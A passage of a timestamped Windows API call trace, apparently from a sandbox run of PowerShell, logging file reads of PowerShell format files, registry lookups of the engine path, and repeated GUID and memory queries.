lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0xbce, 
lpOverlapped=0x0) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419542, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419542*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] CloseHandle (hObject=0x2f8) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.822] GetLastError () returned 0x0 [0052.822] SetErrorMode (uMode=0x1) returned 0x1 [0052.822] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x243add0 | out: lpFileInformation=0x243add0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] SetErrorMode (uMode=0x1) returned 0x1 [0052.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.822] GetLastError () returned 0x0 [0052.822] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.823] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.823] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.823] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.823] GetLastError () returned 0x0 [0052.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.823] GetLastError () returned 0x0 [0052.825] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf339be39, Data2=0x16d8, Data3=0x4240, Data4=([0]=0x86, [1]=0x6d, [2]=0x73, [3]=0x39, [4]=0x9f, [5]=0x99, [6]=0x9c, [7]=0x8b))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x5478bff3, Data2=0xa333, Data3=0x4c60, Data4=([0]=0x93, [1]=0xb1, [2]=0xb5, [3]=0x1, [4]=0x78, [5]=0xce, [6]=0x44, 
[7]=0x9f))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x4cf7ef82, Data2=0xd8f8, Data3=0x43ca, Data4=([0]=0x91, [1]=0x16, [2]=0xca, [3]=0x3f, [4]=0x5f, [5]=0x30, [6]=0xa, [7]=0xca))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xfe24e7a8, Data2=0xb04f, Data3=0x4af1, Data4=([0]=0x9e, [1]=0x11, [2]=0xc5, [3]=0x27, [4]=0x47, [5]=0x11, [6]=0x13, [7]=0xe4))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x580bc07d, Data2=0x8a2f, Data3=0x43b5, Data4=([0]=0x8d, [1]=0xc6, [2]=0x60, [3]=0x0, [4]=0xe7, [5]=0xbb, [6]=0xb9, [7]=0x13))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x85d8a03b, Data2=0x67e1, Data3=0x40b7, Data4=([0]=0xa7, [1]=0x1a, [2]=0xd0, [3]=0xa1, [4]=0x5d, [5]=0x12, [6]=0x5a, [7]=0x80))) returned 0x0 [0052.827] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.827] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xdc8ef19f, Data2=0x3e40, Data3=0x409c, Data4=([0]=0xa5, [1]=0xb8, [2]=0x68, [3]=0xa3, [4]=0x45, [5]=0xa0, [6]=0x6b, [7]=0x17))) returned 0x0 [0052.827] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.827] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.827] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x3d32e643, Data2=0x5c38, Data3=0x41fd, Data4=([0]=0x91, [1]=0xb1, 
[2]=0xfc, [3]=0x61, [4]=0xcf, [5]=0x60, [6]=0x9b, [7]=0xa4))) returned 0x0 [0052.828] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x63399b76, Data2=0x17f7, Data3=0x4166, Data4=([0]=0x88, [1]=0xda, [2]=0x39, [3]=0xf8, [4]=0x9, [5]=0xcd, [6]=0xcc, [7]=0xfe))) returned 0x0 [0052.828] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd10901de, Data2=0xee44, Data3=0x4d75, Data4=([0]=0x8a, [1]=0x6d, [2]=0xd8, [3]=0xd5, [4]=0xa5, [5]=0xbc, [6]=0x19, [7]=0xf4))) returned 0x0 [0052.828] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xac0ac4d7, Data2=0x48d5, Data3=0x4191, Data4=([0]=0x8b, [1]=0xf9, [2]=0x4a, [3]=0x30, [4]=0xf5, [5]=0xcd, [6]=0xb6, [7]=0xda))) returned 0x0 [0052.828] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.828] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x3f40e221, Data2=0x1499, Data3=0x4fe1, Data4=([0]=0xa7, [1]=0x3, [2]=0x92, [3]=0xa6, [4]=0xfa, [5]=0x48, [6]=0x5b, [7]=0xe0))) returned 0x0 [0052.828] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.829] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.829] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.830] VirtualQuery (in: lpAddress=0x14d710, 
lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.830] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.830] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x4ce89d7b, Data2=0xe4b3, Data3=0x4634, Data4=([0]=0x8a, [1]=0x51, [2]=0xe4, [3]=0xbc, [4]=0x33, [5]=0x4b, [6]=0x50, [7]=0xef))) returned 0x0 [0052.830] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xc40600ca, Data2=0x42a6, Data3=0x4c2c, Data4=([0]=0xbd, [1]=0xcc, [2]=0x72, [3]=0xb3, [4]=0x14, [5]=0x1e, [6]=0x8f, [7]=0x6))) returned 0x0 [0052.830] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x11ebfcdf, Data2=0x4d5e, Data3=0x4022, Data4=([0]=0xa6, [1]=0x41, [2]=0x40, [3]=0xc5, [4]=0x83, [5]=0xa5, [6]=0x4a, [7]=0x40))) returned 0x0 [0052.831] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x412dc8ef, Data2=0xe3c9, Data3=0x4256, Data4=([0]=0xb7, [1]=0xa5, [2]=0xa0, [3]=0x6e, [4]=0x37, [5]=0x20, [6]=0x7c, [7]=0xf7))) returned 0x0 [0052.831] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x8c48405a, Data2=0x572, Data3=0x4b47, Data4=([0]=0x86, [1]=0xd6, [2]=0x67, [3]=0x51, [4]=0x42, [5]=0x53, [6]=0xd, [7]=0x38))) returned 0x0 [0052.831] VirtualQuery (in: lpAddress=0x14d864, lpBuffer=0x14e864, dwLength=0x1c | out: lpBuffer=0x14e864*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.831] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x291c5535, Data2=0x9293, Data3=0x4811, Data4=([0]=0x85, [1]=0x62, [2]=0xa0, [3]=0x5, [4]=0xf7, [5]=0xf0, [6]=0x95, [7]=0xf5))) returned 0x0 
[0052.831] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe2112e2b, Data2=0x9c5b, Data3=0x46d2, Data4=([0]=0xa6, [1]=0xdf, [2]=0xf2, [3]=0xef, [4]=0x44, [5]=0xbe, [6]=0x49, [7]=0xbb))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe26ee8d4, Data2=0x3f9, Data3=0x482d, Data4=([0]=0xba, [1]=0xfe, [2]=0xc3, [3]=0x63, [4]=0x9e, [5]=0x79, [6]=0x27, [7]=0x25))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xa962d382, Data2=0x448a, Data3=0x4c71, Data4=([0]=0x8a, [1]=0x93, [2]=0x33, [3]=0x93, [4]=0xd, [5]=0xf6, [6]=0x7e, [7]=0x35))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf5869d7e, Data2=0xb300, Data3=0x4b3e, Data4=([0]=0xa5, [1]=0xbc, [2]=0x37, [3]=0xde, [4]=0x9f, [5]=0xa4, [6]=0xd0, [7]=0x29))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb3691956, Data2=0x58bd, Data3=0x49c6, Data4=([0]=0x96, [1]=0xf0, [2]=0xc8, [3]=0x6b, [4]=0x28, [5]=0x89, [6]=0xea, [7]=0x74))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x38d6c17e, Data2=0xd3cb, Data3=0x40d2, Data4=([0]=0x95, [1]=0xed, [2]=0xa5, [3]=0x95, [4]=0x22, [5]=0x4b, [6]=0x9c, [7]=0x32))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9ae6333b, Data2=0x4429, Data3=0x45d2, Data4=([0]=0xbb, [1]=0x61, [2]=0x6a, [3]=0x88, [4]=0x61, [5]=0xa5, [6]=0xc, [7]=0xdd))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x49ff7f80, Data2=0xd7f7, Data3=0x42e5, Data4=([0]=0xa0, [1]=0x65, [2]=0xbf, [3]=0x17, [4]=0xce, [5]=0x48, [6]=0x51, [7]=0xdc))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd43a2537, Data2=0x882a, Data3=0x4e96, Data4=([0]=0x89, [1]=0x59, [2]=0xd, [3]=0xd7, [4]=0xdc, [5]=0xc4, [6]=0xef, [7]=0xca))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: 
pguid=0x14e9d8*(Data1=0xdcade8f1, Data2=0xee77, Data3=0x406b, Data4=([0]=0x83, [1]=0x84, [2]=0x87, [3]=0x10, [4]=0xc1, [5]=0xd5, [6]=0xa2, [7]=0xc3))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x5028ef4f, Data2=0xbb21, Data3=0x4502, Data4=([0]=0x91, [1]=0xcc, [2]=0x9a, [3]=0x6b, [4]=0xaa, [5]=0x61, [6]=0x43, [7]=0xcb))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x88095cd8, Data2=0xa0d1, Data3=0x44bf, Data4=([0]=0x8e, [1]=0x73, [2]=0x4a, [3]=0x2e, [4]=0x37, [5]=0xe4, [6]=0xb0, [7]=0x64))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x148d20e8, Data2=0xa49b, Data3=0x460d, Data4=([0]=0x82, [1]=0x96, [2]=0xa7, [3]=0xdd, [4]=0x1b, [5]=0xec, [6]=0xcb, [7]=0x81))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xee29b2f0, Data2=0xbe69, Data3=0x417f, Data4=([0]=0x89, [1]=0xa9, [2]=0x86, [3]=0x41, [4]=0x88, [5]=0xcb, [6]=0xee, [7]=0xb2))) returned 0x0 [0052.834] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xca4f4c11, Data2=0xee83, Data3=0x442b, Data4=([0]=0x98, [1]=0x8c, [2]=0xbc, [3]=0xa5, [4]=0xff, [5]=0xdc, [6]=0x22, [7]=0x33))) returned 0x0 [0052.834] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x807a4f10, Data2=0x267b, Data3=0x44f0, Data4=([0]=0xbc, [1]=0xce, [2]=0xfc, [3]=0x3b, [4]=0x28, [5]=0xe7, [6]=0x10, [7]=0x15))) returned 0x0 [0052.834] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd330c9c1, Data2=0x45c5, Data3=0x4b7d, Data4=([0]=0xb1, [1]=0xc0, [2]=0x46, [3]=0x9a, [4]=0x86, [5]=0x6e, [6]=0x19, [7]=0x21))) returned 0x0 [0052.834] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x859745a2, Data2=0x649f, Data3=0x439b, Data4=([0]=0x96, [1]=0x86, [2]=0x91, [3]=0x81, [4]=0xc8, [5]=0x7, [6]=0xc2, [7]=0x60))) returned 0x0 [0052.834] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: 
lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.834] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.835] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.836] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x87729405, Data2=0xdd9f, Data3=0x4222, Data4=([0]=0xa1, [1]=0x39, [2]=0x7d, [3]=0x38, [4]=0xe3, [5]=0x1b, [6]=0xbf, [7]=0x92))) returned 0x0 [0052.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.836] GetLastError () returned 0x0 [0052.836] SetErrorMode (uMode=0x1) returned 0x1 [0052.836] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.836] GetLastError () returned 0x0 [0052.836] GetFileType (hFile=0x2f8) returned 0x1 [0052.836] SetErrorMode (uMode=0x1) returned 0x1 [0052.836] GetFileType (hFile=0x2f8) returned 0x1 [0052.836] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, 
lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.837] GetLastError () returned 0x0 [0052.838] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.838] GetLastError () returned 0x0 [0052.839] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.839] GetLastError () returned 0x0 [0052.839] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.839] GetLastError () returned 0x0 [0052.840] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x119, lpOverlapped=0x0) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] 
CloseHandle (hObject=0x2f8) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.840] GetLastError () returned 0x0 [0052.840] SetErrorMode (uMode=0x1) returned 0x1 [0052.840] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24f8cb8 | out: lpFileInformation=0x24f8cb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] SetErrorMode (uMode=0x1) returned 0x1 [0052.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.840] GetLastError () returned 0x0 [0052.840] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.841] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.841] RegQueryValueExW (in: hKey=0x2f8, 
lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.841] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.841] GetLastError () returned 0x0 [0052.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.841] GetLastError () returned 0x0 [0052.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.842] GetLastError () returned 0x0 [0052.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.842] GetLastError () returned 0x0 [0052.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 
nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.842] GetLastError () returned 0x0 [0052.843] VirtualQuery (in: lpAddress=0x14d6c0, lpBuffer=0x14e6c0, dwLength=0x1c | out: lpBuffer=0x14e6c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.843] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb4c408a3, Data2=0x1521, Data3=0x4583, Data4=([0]=0xbc, [1]=0xd9, [2]=0xde, [3]=0xbb, [4]=0x2f, [5]=0xdf, [6]=0x4d, [7]=0xf))) returned 0x0 [0052.843] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.843] CoCreateGuid (in: pguid=0x14e9d8 | out: 